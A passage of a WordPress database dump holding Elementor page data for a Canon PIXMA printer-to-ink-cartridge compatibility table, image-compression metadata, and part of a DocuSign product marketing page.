Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4689,2784,'_elementor_version','0.4'),(5010,2851,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.077472989956991700211119677987881004810333251953125;s:5:\"bytes\";i:2669;s:11:\"size_before\";i:86727;s:10:\"size_after\";i:84058;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:297;s:11:\"size_before\";i:6048;s:10:\"size_after\";i:5751;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.279999999999999804600747665972448885440826416015625;s:5:\"bytes\";i:538;s:11:\"size_before\";i:16395;s:10:\"size_after\";i:15857;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:306;s:11:\"size_before\";i:9679;s:10:\"size_after\";i:9373;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.75;s:5:\"bytes\";i:596;s:11:\"size_before\";i:21695;s:10:\"size_after\";i:21099;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:2.8300000000000000710542735760100185871124267578125;s:5:\"bytes\";i:932;s:11:\"size_before\";i:32910;s:10:\"size_after\";i:31978;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4691,1481,'_elementor_edit_mode','builder'),(4692,1481,'_elementor_template_type','post'),(4706,2788,'_elementor_edit_mode','builder'),(4705,2788,'_wp_page_template','template-fullwidth.php');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (4704,1481,'_elementor_data','[{\"id\":\"961215d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"554807a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4c3e837\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Get to \\\"yes\\\" faster with DocuSign electronic signatures<\\/h2>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f69381\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f5716c9\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/sKoNwKcGKF0\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4db4450\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"174b5b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b72433e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_1_2.png\",\"id\":2786}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d831cb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf24fed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Sign. Send. Success.<\\/h2><p>Use DocuSign to complete approvals and agreements in minutes or hours\\u2014not days\\u2014from almost anywhere in the world. Quickly and securely access and sign documents. Easily upload and send documents for others to sign. Send reminders and check signing status almost any time.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe44d7\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca057e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d10c158\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Modernize your System of Agreement<\\/h2><p>Go digital beyond the signature. Save additional time, money, and errors by automating and connecting entire agreement processes. Embed electronic signing and payment requests into your existing website, portals, and applications. Use DocuSign\\u2019s pre-built integrations or APIs to connect to the systems you already use. With DocuSign, you not only get The Global Standard for eSignature\\u00ae but also the many options of a System of Agreement Platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ee4d73\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"be54357\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/product_shot_2_2.png\",\"id\":2787}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b27bdc5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4901a06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d4ac2e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Delight customers with an easier way to do business<\\/h2><p>Why do more than 370,000 paying customers use DocuSign? Because they love it. DocuSign is the fast, reliable way to make nearly every agreement and approval process a simple digital action, from electronic signing to payment collection\\u2014on practically any mobile device, from nearly anywhere in the world. Say goodbye to administrative hassles like scanning, faxing, and overnighting, forever.<\\/p><h2>DocuSign makes your business run better<\\/h2><p>Close more deals, streamline operations and stand out from the crowd with a far better customer experience.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4e223a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3293733\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9b77d77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Simple to implement, easy to use\\u2014customers and employees will be up and running in minutes <\\/strong>With the most intuitive experience and simple setup, people will love the convenience of doing business with you. DocuSign is a fast way to get an electronic signature, collect a payment, or get an approval from any customer or vendor from almost anywhere in the world using practically any 